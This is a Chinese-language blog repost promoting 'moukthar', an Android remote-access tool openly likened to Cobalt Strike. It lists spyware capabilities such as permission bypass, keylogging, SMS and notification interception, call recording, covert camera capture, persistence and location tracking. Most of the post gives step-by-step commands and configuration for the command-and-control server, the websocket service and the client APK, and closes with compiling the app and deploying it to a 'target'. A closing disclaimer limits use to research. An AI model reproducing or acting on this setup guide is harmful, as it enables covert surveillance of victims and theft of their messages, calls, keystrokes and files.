安卓版CobaltStrike:远程控制的终极利器:moukthar

admin
admin
admin
145983
文章
119
评论
2025年7月2日19:57:02评论18 views字数 2595阅读8分39秒阅读模式

0x01 工具介绍

Moukthar作为一款强大的开源远程管理工具,以其权限绕过、键值记录、短信监听等硬核功能,成为安卓设备管理的“黑科技”利器。无论是安全研究还是设备管理,Moukthar都能提供高效、稳定的解决方案。本文将带你深入了解Moukthar的强大功能与安装步骤,助你快速上手,轻松掌控安卓设备的方方面面。这款堪称“安卓版CobaltStrike”的工具,解锁远程管理的无限可能!

注意:现在只对常读和星标的公众号才展示大图推送,建议大家把渗透安全HackTwo"设为星标⭐️"则可能就看不到了啦!

下载地址:https://github.com/Tomiwa-Ot/moukthar

0x02 功能简介

工具特点

Android 远程管理工具

  • 权限绕过(Android 12 及以下)https://youtube.com/shorts/-w8H0lkFxb0
  • 键盘记录器https://youtube.com/shorts/Ll9dNrkjFOA
  • 通知监听器
  • 短信监听器
  • 电话录音
  • 图像捕捉和截图
  • 视频录制
  • 持久性
  • 读取和写入联系人
  • 列出已安装的应用程序
  • 下载和上传文件
  • 获取设备位置截图
安卓版CobaltStrike:远程控制的终极利器:moukthar
安卓版CobaltStrike:远程控制的终极利器:moukthar
安卓版CobaltStrike:远程控制的终极利器:moukthar
安卓版CobaltStrike:远程控制的终极利器:moukthar
安卓版CobaltStrike:远程控制的终极利器:moukthar
安卓版CobaltStrike:远程控制的终极利器:moukthar
安卓版CobaltStrike:远程控制的终极利器:moukthar

0x03更新说明

仪表板上的自动滚动日志屏幕截图不起作用当应用程序未聚焦时,图像/视频捕获不起作用使用 DownloadManager 在应用程序中下载文件不起作用列出目录的组成部分并不列出所有文件/文件夹

0x04 使用介绍

📦用法

下载moukthar

moukthar.zip

 

安装 php、composer、mysql、php-mysql 驱动程序、apache2 和 a2enmod

将服务器文件移动到/var/www/html/并安装依赖项

mv moukthar/Server/* /var/www/html/cd /var/www/html/c2-servercomposer installcd /var/www/html/web-socket/composer installcd /var/wwwchown -R www-data:www-data .chmod -R 777 .

默认凭据是用户名:android和密码:android

创建新的 SQL 用户

CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password';GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost';FLUSH PRIVILEGES;

c2-server/.env在和中设置数据库凭据web-socket/.env

执行database.sql

在 Linux 中启动 Web 套接字服务器或部署为服务

php Server/web-socket/App.php# ORsudo mv Server/websocket.service /etc/systemd/system/sudo systemctl daemon-reloadsudo systemctl enable websocket.servicesudo systemctl start websocket.service

调整

/etc/apache2/sites-available/000-default.conf

<VirtualHost *:80>      ServerAdmin webmaster@localhost      DocumentRoot /var/www/html/c2-server      DirectoryIndex app.php      Options -Indexes      ErrorLog ${APACHE_LOG_DIR}/error.log      CustomLog ${APACHE_LOG_DIR}/access.log combined</VirtualHost>

调整/etc/apache2/apache2.conf

  Comment this section  #<Directory />  #       Options FollowSymLinks  #       AllowOverride None  #       Require all denied  #</Directory> Add this  <Directory /var/www/html/c2-server>      Options -Indexes      DirectoryIndex app.php      AllowOverride All      Require all granted  </Directory>

增加 php 文件上传最大大小

/etc/php/*.*/apache2/php.ini

; Increase size to permit large file uploads from clientupload_max_filesize = 128M; Set post_max_size to upload_max_filesize + 1post_max_size = 129M

c2-server/src/View/home.php在 <script>标签中设置 Web 套接字服务器地址c2-server/src/View/features/files.php

const ws = new WebSocket('ws://IP_ADDRESS:8080');

使用以下命令重新启动 apache

sudo a2enmod rewrite && sudo service apache2 restart

在客户端设置C2服务器和Web套接字服务器地址functionality/Utils.java

public static final String C2_SERVER = "http://localhost";public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";

使用 Android Studio 编译 APK 并部署到目标

视频教程

https://www.youtube.com/watch?v=ykOx19hAaD4

0x05 下载

https://github.com/Tomiwa-Ot/moukthar

原文始发于微信公众号(渗透安全HackTwo):安卓版CobaltStrike:远程控制的终极利器|漏洞探测

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月2日19:57:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安卓版CobaltStrike:远程控制的终极利器:mouktharhttp://cn-sec.com/archives/4217134.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息